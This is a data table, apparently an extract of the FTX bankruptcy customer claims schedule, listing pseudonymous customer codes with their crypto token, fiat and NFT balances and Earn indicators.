| 07360800 | | BRZ[2], CUSDT[6], DAI[0], DOGE[2], GRT[2], SOL[0], TRX[91.26803452], USD[1.78] | | |
| 07360801 | | DOGE[1], USD[0.00] | | |
| 07360802 | | CUSDT[1], USD[0.00] | | |
| 07360803 | | NFT [361210301286317895/Coachella x FTX Weekend 1 #8695][1] | | |
| 07360804 | | USD[10.00] | | |
| 07360805 | | USD[11.03] | Yes | |
| 07360806 | | BTC[.00022309], SOL[.00001954], USD[0.00] | Yes | |
| 07360807 | | BRZ[3], CUSDT[8], DOGE[1], TRX[1], USD[0.01] | | |
| 07360808 | | USD[10.00] | | |
| 07360810 | | SOL[.09752341], USD[0.00] | | |
| 07360811 | | CUSDT[2], USD[0.00] | Yes | |
| 07360812 | | BTC[.0054112], SOL[.02], USD[0.55] | | |
| 07360813 | | USD[10.00] | | |
| 07360814 | | USD[10.00] | | |
| 07360815 | | CUSDT[1], NFT [499320767704611999/FTX - Off The Grid Miami #2941][1], TRX[85.9512653], USD[0.00] | Yes | |
| 07360816 | | LINK[.28485308], USD[0.00] | | |
| 07360817 | | BTC[.01001339], CUSDT[11], DOGE[2292.47326872], NFT [498647896329265176/Entrance Voucher #3071][1], SHIB[2], SOL[.70740112], SUSHI[16.36447253], USD[0.05] | Yes | |
| 07360818 | | USD[10.00] | | |
| 07360819 | | BAT[1.5317105], BRZ[2], BTC[.00023683], CUSDT[376.97940058], DOGE[8359.63383885], TRX[75.51245951], USD[0.98] | | |
| 07360821 | | CUSDT[7], DOGE[3698.54636673], SHIB[8953178.60342116], TRX[1925.00049734], USD[0.00] | Yes | |
| 07360822 | | BAT[1.0165555], BRZ[1.99236019], BTC[.00037101], CUSDT[238.24948694], DOGE[1151.50464011], ETH[.00391867], ETHW[.00386395], KSHIB[.24761928], SHIB[1141862.55398953], SOL[2.93209031], TRX[83.08195495], UNI[1.15574474], USD[0.00], USDTZ.16093497] | Yes | |
| 07360823 | | BAT[21.95825086], CUSDT[2], DOGE[782.1882373], GRT[18.11816062], SHIB[110574.98994772], SUSHI[4.01061354], TRX[176.09248676], USD[69.09] | | |
| 07360824 | | USD[23.30] | | |
| 07360825 | | CUSDT[1], DOGE[1], ETH[1.686], ETHW[1.686], GRT[479.33608554], USD[0.00] | | |
| 07360826 | | USD[10.00] | | |
| 07360827 | | USD[10.00] | | |
| 07360828 | | USD[3.17] | | |
| 07360829 | | BRZ[1], TRX[1], USD[0.20] | | |
| 07360830 | | DOGE[1], USD[0.00] | | |
| 07360831 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07360832 | | USD[10.00] | | |
| 07360833 | | DOGE[690.59425], USD[0.22] | | |
| 07360834 | | DOGE[36.12564586], USD[0.00] | | |
| 07360835 | | BRZ[1], BTC[0], DOGE[0], ETH[0], GRT[0], SOL[.0464056], USD[0.00], USDT[0.00000001] | | |
| 07360837 | | BTC[0], DOGE[0], ETH[0], USD[0.01], USDT[1] | | |
| 07360838 | | DOGE[1], MATIC[5.90597663], USD[0.00] | | |
| 07360839 | | USD[0.03] | | |
| 07360840 | | BTC[.00021184], DOGE[989.71710193], ETH[.00000022], ETHW[.0000022], USD[0.00] | Yes | |
| 07360841 | | LINK[.35882385], USD[0.00] | | |
| 07360842 | | BRZ[1], CUSDT[2], DOGE[1], TRX[2], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07360843 | | CUSDT[80.63737137], DOGE[24.12472253], KSHIB[75.9919196], SHIB[423628.94983974], TRX[100.00449028], USD[0.53] | Yes | |
| 07360844 | | BTC[0], DOGE[0], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07360845 | | SOL[0] | | |
| 07360846 | | CUSDT[1], TRX[1624.39241952], USD[0.00] | Yes | |
| 07360847 | | BAT[1], BTC[.10014878], CUSDT[3], DOGE[2444.65964032], SHIB[3.72803657], TRX[1], USD[0.00] | | |
| 07360849 | | USD[10.00] | | |
| 07360851 | | BTC[0], DOGE[5.25078264], USD[0.00] | Yes | |
| 07360852 | | AAVE[2.18983727], CUSDT[0], DOGE[0], SHIB[6309972.67726420], SOL[0], SUSHI[0], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07360853 | | DOGE[1], USD[0.00] | | |
| 07360854 | | USD[10.00] | | |
| 07360857 | | USD[10.00] | | |
| 07360858 | | USD[10.00] | | |
| 07360860 | | USD[10.00] | | |
| 07360861 | | DOGE[0.19146518], TRX[0], USD[0.00] | | |
| 07360862 | | USD[0.83] | | |
| 07360863 | | USD[10.00] | | |
| 07360864 | | DOGE[1067.26175058], USD[86.63] | | |
| 07360865 | | USD[10.00] | | |
| 07360866 | | GRT[9.27781085], USD[0.00] | Yes | |
| 07360867 | | USD[10.00] | | |
| 07360869 | | CUSDT[1], TRX[2], USD[101.21] | Yes | |
| 07360871 | | USD[10.00] | | |
| 07360872 | | GRT[4.34185735], USD[0.00] | | |
| 07360873 | | USD[0.01] | | |
| 07360874 | | MATIC[12], USD[0.51] | | |
| 07360875 | | CUSDT[1], DOGE[2], USD[0.01] | | |
| 07360876 | | CUSDT[1], ETH[0], MATIC[11.7136615], SOL[0], SUSHI[0], USD[0.72], USDT[0.00000001] | Yes | |
| 07360877 | | BTC[0], DOGE[0], ETH[0], TRX[2.59837867], USD[0.00] | | |
| 07360878 | | USD[10.00] | | |
| 07360879 | | DOGE[154.9703714], USD[0.00] | Yes | |
| 07360882 | | BRZ[0], BTC[0], CUSDT[1.01448761], USD[0.00] | | |
| 07360883 | | USD[10.00] | | |
| 07360885 | | USD[10.00] | | |
| 07360886 | | USD[10.00] | | |
| 07360887 | | USD[11.09] | Yes | |
| 07360888 | | USD[10.00] | | |
| 07360889 | | BRZ[0], BTC[0], DOGE[0], ETH[0], LTC[0], USD[0.00] | | |
| 07360890 | | BRZ[1], CUSDT[1], DOGE[101.14710242], USD[0.16] | | |
| 07360891 | | USD[10.00] | | |
| 07360892 | | USD[10.00] | | |
| 07360893 | | USD[10.00] | | |
| 07360894 | | SOL[0], USD[0.00] | Yes | |
| 07360895 | | USD[10.81] | Yes | |
| 07360896 | | BRZ[0], DOGE[0], SHIB[2], USD[0.00] | Yes | |
| 07360897 | | USD[10.00] | | |
| 07360898 | | SHIB[139.0851794], USD[0.00] | | |
| 07360899 | | USD[10.00] | | |
| 07360900 | | USD[10.00] | | |
| 07360901 | | ETH[.00000059], ETHW[.00000059], USD[0.00] | Yes | |
| 07360902 | | DOGE[38543.34924542], SHIB[16271593.39432], USD[0.00] | | |
| 07360903 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07360904 | | USD[0.00] | | |
| 07360905 | | DOGE[21242.07795072], SHIB[48042614.11387434], USD[0.00], USDT[1] | | |
| 07360906 | | SUSHI[.66266417], USD[155.00] | | |
| 07360907 | | USD[10.00] | | |
| 07360908 | | DOGE[1], TRX[1], USD[0.97] | Yes | |
| 07360909 | | BRZ[3], CUSDT[11], DOGE[.24301561], ETHW[1.03412183], GRT[1.00445294], SHIB[2437555.81126655], TRX[3], UNI[1], USD[10053.10], USDT[0] | Yes | |
| 07360910 | | BAT[1.01375578], BRZ[8.39001901], BTC[0.05276611], CUSDT[44], DOGE[7733.93756636], GRT[1], KSHIB[0], MATIC[.0016005], NFT [342281640687495564/SOLYETIS #2096][1], NFT [568365762211938884/SOLYETIS #8880][1], SHIB[31884940.64569501], SOL[17.91861046], TRX[22.47812977], USD[0.00], USDT[2.15202363] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07360911 | | USD[10.00] | | |
| 07360912 | | USD[0.21] | | |
| 07360913 | | CUSDT[3], DOGE[1260.62425765], TRX[1], USD[0.00] | | |
| 07360914 | | CUSDT[1], DOGE[1], LINK[0], SUSHI[1], TRX[1], USD[0.00] | | |
| 07360915 | | USD[10.00] | | |
| 07360916 | | BAT[2], BRZ[7], CUSDT[13], DAI[0], DOGE[13], PAXG[0], SUSHI[0], TRX[4], USD[0.00], USDT[3] | | |
| 07360917 | | USD[10.00] | | |
| 07360919 | | USD[10.00] | | |
| 07360920 | | CUSDT[1], DOGE[15409.22272798], TRX[966.72281016], USD[0.00] | | |
| 07360921 | | BAT[1], BRZ[3], CUSDT[23], TRX[3], USD[0.00], USDT[1] | | |
| 07360922 | | DOGE[130.30556234], USD[1.05] | | |
| 07360923 | | BCH[0], USD[0.00] | | |
| 07360924 | | USD[10.00] | | |
| 07360925 | | DOGE[347.53081849], USD[0.00] | | |
| 07360926 | | USD[0.00] | Yes | |
| 07360927 | | USD[10.00] | | |
| 07360928 | | BAT[1], BRZ[1], CUSDT[4], TRX[4], USD[0.00] | | |
| 07360929 | | USD[10.00] | | |
| 07360930 | | USD[10.80] | Yes | |
| 07360931 | | USD[10.00] | | |
| 07360932 | | CUSDT[1], DOGE[1429.82996344], TRX[1], USD[0.00] | | |
| 07360933 | | BAT[1], CUSDT[2], DOGE[24771.72117524], TRX[3902.33315564], USD[0.00] | | |
| 07360934 | | BTC[.00022071], TRX[1], USD[0.00] | Yes | |
| 07360935 | | BAT[16.60945484], BTC[.01125317], CUSDT[9], DOGE[3131.80473741], ETH[.07457097], ETHW[.07457097], SHIB[187057.61282094], SUSHI[2.31088857], TRX[5], UNI[.83573308], USD[0.00] | | |
| 07360936 | | USD[10.00] | | |
| 07360937 | | BAT[0], BRZ[0], BTC[0], CUSDT[10], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], PAXG[0], SOL[0], SUSHI[0], TRX[2], UNI[0], USD[0.00], USDT[0.00000001], YFI[0] | | |
| 07360938 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07360939 | | USD[10.00] | | |
| 07360940 | | USD[10.00] | | |
| 07360941 | | BRZ[0], CUSDT[1], DOGE[30.26718894], GRT[1], LINK[0], LTC[0], SOL[0], UNI[0], USD[0.01], USDT[0] | | |
| 07360944 | | USD[10.00] | | |
| 07360946 | | BRZ[1], CUSDT[4], TRX[2], USD[0.00] | | |
| 07360947 | | TRX[191.47416387], USD[0.00] | Yes | |
| 07360949 | | USD[0.00] | | |
| 07360950 | | DOGE[135.24990984], USD[0.00] | Yes | |
| 07360951 | | BRZ[1], DOGE[0], USD[0.00] | Yes | |
| 07360952 | | USD[10.00] | | |
| 07360953 | | USD[10.00] | | |
| 07360955 | | DOGE[9054.68927015], TRX[1], USD[0.00] | | |
| 07360956 | | USD[10.00] | | |
| 07360957 | | USD[10.00] | | |
| 07360958 | | DOGE[0.00077225], USD[10.00] | | |
| 07360959 | | USD[0.00] | Yes | |
| 07360960 | | USD[10.00] | | |
| 07360961 | | USD[10.00] | | |
| 07360962 | | BTC[0], USD[0.00] | | |
| 07360963 | | CUSDT[1], DOGE[2], USD[0.00] | | |
| 07360964 | | USD[1.27] | | |
| 07360965 | | USD[10.00] | | |
| 07360966 | | USD[10.00] | | |
| 07360967 | | USD[10.00] | | |
| 07360968 | | BAT[13.89498087], USD[0.00] | | |
| 07360969 | | USD[10.00] | | |
| 07360970 | | DOGE[808.35554727], USD[0.00] | | |
| 07360971 | | DOGE[0], USD[0.00], USDT[0] | | |
| 07360972 | | USD[10.00] | | |
| 07360973 | | USD[10.00] | | |
| 07360974 | | DOGE[172.97491777], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07360975 | | BRZ[2], CUSDT[14], ETH[.00000383], ETHW[.00000383], GRT[1.0001826], NFT (419319465276740031/Settler #760)[1], SOL[0], SUSHI[0], TRX[3], USD[0.00] | Yes | |
| 07360976 | | USD[0.00] | | |
| 07360977 | | DOGE[347.95732528], ETH[.00171285], ETHW[.00171285], TRX[223.0325739], USD[0.84] | | |
| 07360978 | | USD[11.03] | Yes | |
| 07360979 | | CUSDT[1], DOGE[1], USD[0.09] | | |
| 07360980 | | BTC[0], ETH[0.00162506], ETHW[0.00162506], TRX[.000002], USD[0.00], USDT[0] | | |
| 07360981 | | USD[10.00] | | |
| 07360982 | | USD[10.00] | | |
| 07360983 | | BAT[1], BRZ[1], CUSDT[6], DOGE[3], GRT[1], KSHIB[6575.3011031], SHIB[2199125.96970502], TRX[4], USD[0.00], USDT[0] | | |
| 07360984 | | BAT[0], BCH[0], DOGE[0], GRT[0], LINK[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0.00000001] | | |
| 07360985 | | BRZ[3], CUSDT[2], DOGE[215.56202858], TRX[456.33640519], USD[0.12] | Yes | |
| 07360986 | | USD[10.00] | | |
| 07360987 | | BTC[0], ETH[0], ETHW[0], GRT[0], USD[2.62] | | |
| 07360988 | | USD[10.00] | | |
| 07360989 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07360990 | | USD[10.00] | | |
| 07360991 | | USD[10.00] | | |
| 07360992 | | USD[10.00] | | |
| 07360993 | | USD[10.00] | | |
| 07360994 | | BAT[1], CUSDT[2], DAI[.00003562], GRT[.00001543], USD[0.00] | | |
| 07360995 | | USD[0.00] | | |
| 07360996 | | USD[0.01] | | |
| 07360997 | | USD[10.00] | | |
| 07360998 | | BTC[.01619793], CUSDT[1], DOGE[3], GRT[190.501533], TRX[2], USD[0.33] | | |
| 07360999 | | TRX[1], USD[0.01] | | |
| 07361001 | | CUSDT[1], DOGE[.49575075], USD[0.00] | | |
| 07361003 | | BAT[4.16150085], BRZ[8.59131632], CUSDT[6], DOGE[4], GRT[9.3539815], LINK[1.05985392], LTC[0], MATIC[1.00737923], SHIB[4], SOL[0], SUSHI[1.03889549], TRX[18.86842105], USD[0.00], USDT[8.54778436] | Yes | |
| 07361004 | | USD[10.00] | | |
| 07361005 | | USD[10.00] | | |
| 07361006 | | USD[10.00] | | |
| 07361007 | | USD[10.00] | | |
| 07361008 | | USD[10.00] | | |
| 07361010 | | USD[10.00] | | |
| 07361011 | | BTC[.00841924], SHIB[3], USD[7.72] | Yes | |
| 07361012 | | USD[10.00] | | |
| 07361013 | | USD[10.00] | | |
| 07361014 | | USD[0.00] | | |
| 07361015 | | USD[10.00] | | |
| 07361016 | | BRZ[2], BTC[.00024286], CUSDT[8], DOGE[0], USD[1.57] | | |
| 07361017 | | USD[10.00] | | |
| 07361019 | | USD[10.00] | | |
| 07361020 | | USD[10.00] | | |
| 07361021 | | USD[10.00] | | |
| 07361022 | | SOL[.76206213], USD[0.00] | Yes | |
| 07361023 | | BRZ[0], DOGE[3.68267934], ETH[0], ETHW[0], USD[0.00] | | |
| 07361025 | | ETH[.005909], ETHW[.034909], SOL[0], TRX[0], USDT[0.00000020] | | |
| 07361026 | | USD[10.00] | | |
| 07361027 | | USD[10.00] | | |
| 07361028 | | BRZ[0], DAI[0], DOGE[0], USD[0.00] | | |
| 07361029 | | TRX[2843.34374153], USD[0.00] | Yes | |
| 07361030 | | CUSDT[4], USD[0.00] | | |
| 07361031 | | USD[10.00] | | |
| 07361032 | | CUSDT[2], TRX[1], USD[0.37] | | |
| 07361034 | | USD[10.76] | Yes | |
| 07361035 | | USD[0.00] | | |
| 07361036 | | BCH[.00000001], CUSDT[1], DOGE[1817.6700156], TRX[1.02956313], USD[0.99] | Yes | |
| 07361037 | | TRX[213.12000872], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07361039 | | NFT (31004463835422 7482/StarAtlas Anniversary)[1], NFT (33632561008721 0619/StarAtlas Anniversary)[1], NFT (34812098886523 0368/Series 1: Capitals #771)[1], NFT (348279962367198058/StarAtlas Anniversary)[1], NFT (35062463960662 4017/StarAtlas Anniversary)[1], NFT (360208159255945044/PixelPuffins #4627)[1], NFT (401055628319896523/Series 1: Capitals #1109)[1], NFT (411907413558526745/Series 1: Capitals #1149)[1], NFT (421677164529039946/Hall of Fantasy League #161)[1], NFT (422373450997292352/FTX - Off The Grid Miami #3207)[1], NFT (433053536385181311/Hall of Fantasy League #165)[1], NFT (459557164772644523/StarAtlas Anniversary)[1], NFT (460687321186026422/FTX - Off The Grid Miami #3205)[1], NFT (481186172204201 04/Series 1: Capitals #1129)[1], NFT (488852556091130292/StarAtlas Anniversary)[1], NFT (498002255429592379/Series 1: Capitals #1069)[1], NFT (506471445655133705/StarAtlas Anniversary)[1], NFT (527880280849964683/Hall of Fantasy League #163)[1], NFT (547382177193080912/StarAtlas Anniversary)[1], SHIB[3], USD[0.00] | Yes | |
| 07361041 | Contingent, Disputed | USD[0.01] | Yes | |
| 07361042 | | USD[10.00] | | |
| 07361043 | | BRZ[0], DOGE[3355.35124736], GRT[185.03118261], MATIC[23.44471365], SOL[9.36395226], USD[0.00], USDT[0] | Yes | |
| 07361044 | | BTC[.00016912], USD[0.00] | | |
| 07361045 | | USD[10.00] | | |
| 07361046 | | BRZ[299.86742825], CUSDT[3046.62950633], DOGE[1.17555227], ETH[.07932732], ETHW[.07834524], TRX[376.61936093], USD[0.04] | Yes | |
| 07361047 | | ETH[0], SOL[0.00000001], USD[0.00] | Yes | |
| 07361048 | | USD[10.00] | | |
| 07361049 | | USD[9.10] | | |
| 07361050 | | USD[0.00] | Yes | |
| 07361051 | | USD[10.00] | | |
| 07361052 | | CUSDT[1], USD[0.00] | | |
| 07361053 | | CUSDT[2542.05395164], DOGE[3035.88483438], KSHIB[2388.91257893], USD[7.17] | Yes | |
| 07361054 | | BRZ[2], CUSDT[3], SHIB[2], USD[215.56], USDT[0] | Yes | |
| 07361055 | | SUSHI[73.26590447], USD[10.00], USDT[1] | | |
| 07361056 | | DOGE[0], USD[0.01] | | |
| 07361057 | | USD[10.00] | | |
| 07361058 | | USD[10.00] | | |
| 07361059 | | CUSDT[2], DOGE[3379.37667869], USD[51.00], USDT[44.73491832] | | |
| 07361060 | | USD[10.71] | Yes | |
| 07361062 | | DOGE[1], TRX[65.45183265], USD[0.00] | | |
| 07361063 | | CUSDT[2], DOGE[10127.35517105], USD[0.00] | Yes | |
| 07361064 | | USD[0.01], USDT[0] | | |
| 07361065 | | BTC[0], DOGE[0], ETH[0], ETHW[0], USD[0.04] | Yes | |
| 07361068 | | USD[10.00] | | |
| 07361069 | | USD[10.00] | | |
| 07361070 | | USD[0.00] | | |
| 07361071 | | USD[10.00] | | |
| 07361072 | | SOL[1], USD[510.00] | | |
| 07361074 | | DOGE[589.62361257], ETH[.00638074], ETHW[.00638074], USD[10.00] | | |
| 07361075 | | ETH[0], ETHW[0], TRX[0] | | |
| 07361076 | | USD[10.00] | | |
| 07361077 | | BTC[.00024836], CUSDT[4], DOGE[356.97789631], LTC[.11844334], NFT (361133461101837479/Barcelona Ticket Stub #794)[1], NFT (365774913696431716/FTX - Off The Grid Miami #4489)[1], NFT (516505038672040394/Imola Ticket Stub #2328)[1], SHIB[2], SUSHI[.8677226], USD[0.00] | Yes | |
| 07361078 | | BAT[21.89860658], TRX[2.00086798], USD[0.00] | Yes | |
| 07361079 | | USD[11.02] | Yes | |
| 07361080 | | USD[10.00] | | |
| 07361081 | | USD[10.00] | | |
| 07361082 | | USD[10.00] | | |
| 07361083 | | USD[10.00] | | |
| 07361084 | | CUSDT[1], DOGE[1.21149384], USD[3.20] | | |
| 07361085 | | BTC[.00023488], CUSDT[17], DOGE[6570.78015862], TRX[3], USD[1.00] | | |
| 07361086 | | TRX[1], USD[0.00] | Yes | |
| 07361087 | | CUSDT[9], DOGE[896.29790546], ETH[.00497129], ETHW[.00497129], SHIB[1], TRX[3], USD[0.00], USDT[1] | | |
| 07361088 | | EUR[8.28], USD[0.00] | | |
| 07361089 | | BAT[0], BTC[.00000003], CUSDT[7], DOGE[24.39510355], GRT[0.00000001], SHIB[3], SOL[0.08366606], TRX[2], USD[0.00] | Yes | |
| 07361090 | | BRZ[1], CUSDT[1593.71583896], DOGE[726.69215178], TRX[572.6018692], USD[0.00] | | |
| 07361091 | | USD[10.00] | | |
| 07361092 | | USD[10.00] | | |
| 07361093 | | CUSDT[3], DOGE[1], SHIB[11.08265046], TRX[.23567392], USD[0.52], USDT[0] | Yes | |
| 07361094 | | BAT[1], CUSDT[1], DOGE[1.08469638], TRX[82.88545487], USD[1.36] | | |
| 07361095 | | TRX[162.75310549], USD[0.00] | | |
| 07361096 | | USD[10.00] | | |
| 07361097 | | AVAX[0.00000021], BF_POINT[200], DOGE[0], ETHW[5.74716408], NFT (312364547563719616/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #57)[1], NFT (406384104955974791/Doak Walker's Playbook: SMU vs. Santa Clara - September 27, 1947 #46)[1], NFT (435341473825601125/FTX - Off The Grid Miami #1015)[1], SHIB[2], SOL[0], USD[0.00], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07361098 | | BTC[.00000407], USD[0.00] | | |
| 07361099 | | USD[0.00] | | |
| 07361100 | | BRZ[1], CUSDT[1], USD[0.14] | | |
| 07361101 | | DOGE[20], USD[10.00] | | |
| 07361102 | | USD[0.00] | | |
| 07361103 | | USD[10.00] | | |
| 07361104 | | USD[10.00] | | |
| 07361105 | | USD[10.00] | | |
| 07361106 | | BTC[.00025886], USD[0.00] | Yes | |
| 07361108 | | BRZ[1.00009623], CUSDT[5], DOGE[1.00001201], ETH[0], GRT[.00004498], TRX[3], USD[0.00] | Yes | |
| 07361109 | | BAT[1.01457828], CUSDT[2], DOGE[35889.3420522], SHIB[9572939.3457596], SOL[45.166195939], TRX[7], USD[0.00], USDT[1.08207841] | | |
| 07361110 | | USD[10.00] | | |
| 07361111 | | CUSDT[2], TRX[3], USD[0.00] | | |
| 07361112 | | DOGE[0], ETH[0], UNI[0], USD[0.00] | | |
| 07361113 | | USD[10.00] | | |
| 07361115 | | USD[10.00] | | |
| 07361117 | | BRZ[1], CUSDT[1], DOGE[.41166107], LTC[2.92250952], SOL[1], USD[0.00] | | |
| 07361118 | | USD[10.00] | | |
| 07361119 | | USD[10.00] | | |
| 07361121 | | ALGO[.00877822], AVAX[4.07764886], BAT[15.26639226], BRZ[2], BTC[.00000002], CUSDT[1], DOGE[7.00057537], ETH[.00000001], ETHW[7.55722479], GRT[1], MATIC[125.35039833], SHIB[53], TRXI1.02202653], USD[0.04], USDT[0.00000011] | Yes | |
| 07361122 | | DOGE[168.4], USD[0.00] | | |
| 07361123 | | BRZ[1], CUSDT[1], USD[0.00] | Yes | |
| 07361124 | | SOL[3.994], USD[254.76] | | |
| 07361125 | | BTC[.00107157], CUSDT[1], TRX[1], USD[0.00] | | |
| 07361127 | | USD[10.00] | | |
| 07361128 | | TRX[1], USD[0.00] | | |
| 07361129 | | BRZ[1], CUSDT[4], USD[97.02] | | |
| 07361130 | | CUSDT[0], DOGE[0], TRX[0], USD[0.00], USDT[0] | | |
| 07361131 | | CUSDT[1], DOGE[2], SUSHI[.00002529], TRX[1], USD[5.97] | | |
| 07361132 | | BRZ[0], DOGE[113.89666858], USD[0.00] | Yes | |
| 07361133 | | USD[10.00] | | |
| 07361134 | | USD[10.00] | | |
| 07361135 | | SOL[10.21977], USD[0.57], USDT[0] | | |
| 07361139 | | BTC[0], ETH[.000712], ETHW[.000712], LINK[.0832], SUSHI[.414], USD[0.00] | | |
| 07361140 | | USD[10.00] | | |
| 07361141 | | BTC[.00017438], USD[0.00] | | |
| 07361142 | | CUSDT[4], DOGE[1], ETH[.00953226], ETHW[.00940914], TRX[4], USD[0.00] | Yes | |
| 07361143 | | BAT[2.1104482], BRZ[3], CUSDT[5], DOGE[3], TRX[6], USD[0.00], USDT[2.19770048] | Yes | |
| 07361144 | | CUSDT[7], DOGE[5508.59025537], TRX[5360.6224164], USD[0.00] | Yes | |
| 07361145 | | CUSDT[4], DOGE[776.87982119], SHIB[1], TRX[3], USD[4.70] | Yes | |
| 07361146 | | BRZ[1], CUSDT[3], DOGE[12640.31931434], ETH[.01867864], ETHW[.01844608], KSHIB[65.93948601], SHIB[373865.73518105], UNI[1.29095825], USD[0.00] | Yes | |
| 07361147 | | USD[10.00] | | |
| 07361148 | | CUSDT[1], DOGE[3], TRX[1], UNI[.00062934], USD[8.38] | | |
| 07361149 | | AAVE[.61688449], BRZ[2], CUSDT[3], ETHW[.70695087], MATIC[84.36030073], TRX[4], USD[0.16] | Yes | |
| 07361150 | | USD[10.00] | | |
| 07361151 | | USD[10.00] | | |
| 07361152 | | BAT[1], CUSDT[2], DOGE[4.00586182], TRX[2], USD[0.00] | | |
| 07361153 | | BCH[0], DOGE[0], ETH[0], ETHW[72.67473204], MATIC[0], SHIB[0.00000003], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07361154 | | CUSDT[2], DOGE[.00221993], TRX[2], USD[0.94], USDT[0] | Yes | |
| 07361155 | | ETH[0.03406600], ETHW[0.03364161], SOL[1.37310624], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07361157 | | USD[10.00] | | |
| 07361158 | | DOGE[24.93303547], USD[0.00] | | |
| 07361160 | | USD[10.00] | | |
| 07361161 | | USD[10.00] | | |
| 07361162 | | CUSDT[1], DOGE[1.22711722], SOL[4.66904312], USD[-25.00] | | |
| 07361163 | | USD[10.00] | | |
| 07361164 | | USD[10.00] | | |
| 07361165 | | BRZ[4], CUSDT[17], DOGE[382.09771931], SHIB[2], TRX[6], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07361166 | | BRZ[1], BTC[0], DOGE[0], USD[0.01] | Yes | |
| 07361167 | | USD[10.85] | Yes | |
| 07361168 | | USD[3.08] | Yes | |
| 07361169 | | BAT[3.07105568], BRZ[4], CUSDT[8], DOGE[1], GRT[1.00367791], SHIB[4], USD[0.01], USDT[1.01066838] | | |
| 07361170 | | USD[10.00] | | |
| 07361171 | | DOGE[1], USD[0.01] | | |
| 07361172 | | BAT[0], BCH[0], BRZ[1], CUSDT[9], DOGE[3.0217215], SHIB[5127527.1864349], USD[0.00] | Yes | |
| 07361174 | | USD[10.00] | | |
| 07361175 | | DOGE[631.975208], USD[0.03] | | |
| 07361176 | | DOGE[1], USD[0.00] | | |
| 07361177 | | CUSDT[10], USD[13.39], USDT[0.00000263], YFI[0] | | |
| 07361178 | | USD[10.00] | | |
| 07361180 | | BTC[.00017788], USD[0.00] | | |
| 07361181 | | USD[10.00] | | |
| 07361182 | | ETH[.00463818], ETHW[.00463818], USD[0.00] | | |
| 07361183 | | DOGE[1.00000235], TRX[1], USD[0.08] | | |
| 07361184 | | CUSDT[1], TRX[2], USD[0.01], USDT[1] | | |
| 07361185 | | DOGE[.4728], ETH[.00000001], ETHW[0], SUSHI[.02426658], USD[0.73] | | |
| 07361186 | | USD[10.00] | | |
| 07361187 | | USD[10.00] | | |
| 07361188 | | BAT[1.0165555], CUSDT[4], DOGE[1], ETH[.00000132], ETHW[.14347863], NFT [307014272765178480/Entrance Voucher #4197][1], SHIB[1], TRX[3], USD[0.04], USDT[1.0915091] | Yes | |
| 07361189 | | USD[0.00] | | |
| 07361190 | | BAT[1.0165555], BTC[.02508517], CUSDT[4], DOGE[5.13887948], ETH[.09514511], ETHW[.09410734], LINK[13.01431626], SOL[.57825143], TRX[2], USD[0.00] | Yes | |
| 07361191 | | CUSDT[1], DOGE[111.31820143], TRX[1], USD[0.00] | Yes | |
| 07361192 | | USD[10.00] | | |
| 07361193 | | BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], UNI[0], USD[10.00], USDT[0.00001274] | | |
| 07361194 | | BAT[35.37952793], BRZ[1], DOGE[9806.97898113], ETH[0.06514721], ETHW[0.06434010], SHIB[17584358.06328915], SUSHI[6.11121958], TRX[2], USD[0.15], USDT[0.00000001] | Yes | |
| 07361195 | | SHIB[2341883.62458577], USD[0.00] | Yes | |
| 07361196 | | CUSDT[3], DOGE[.00010493], NFT [532148880812956040/Entrance Voucher #3078][1], SUSHI[.36467356], USD[0.00], USDT[0] | Yes | |
| 07361197 | | BAT[1], BRZ[2], CUSDT[4], DOGE[1.00005503], LTC[.00000732], TRX[4], USD[0.00] | | |
| 07361198 | | BTC[.05870434], DOGE[1], ETH[.49665879], ETHW[.49645025], TRX[1], USD[0.00], USDT[1.09695514] | Yes | |
| 07361200 | | USD[10.00] | | |
| 07361202 | | USD[10.00] | | |
| 07361203 | | CUSDT[730.1686813], DOGE[3], TRX[2533.55877668], USD[0.00] | | |
| 07361204 | | USD[10.00] | | |
| 07361205 | | BAT[1], CUSDT[7], ETH[0], SHIB[17471606.29310594], USD[0.01] | | |
| 07361206 | | BTC[.00506725], DAI[4.97750872], DOGE[913.45365360], TRX[81.4033415], USD[0.00], USDT[7.09292214] | | |
| 07361207 | | BTC[0], ETH[.00027], ETHW[.00027], USD[13.82] | | |
| 07361208 | | BRZ[2], CUSDT[8], DOGE[1.00000023], GRT[4.51229569], KSHIB[.00005333], SHIB[380052.0943532], TRX[5], USD[0.01] | Yes | |
| 07361209 | | BTC[.00030207], DOGE[1], SHIB[5], TRX[1], USD[0.00] | Yes | |
| 07361210 | | USD[10.00] | | |
| 07361211 | | BTC[.00124464], CUSDT[1], DOGE[1.0003427], USD[0.00] | Yes | |
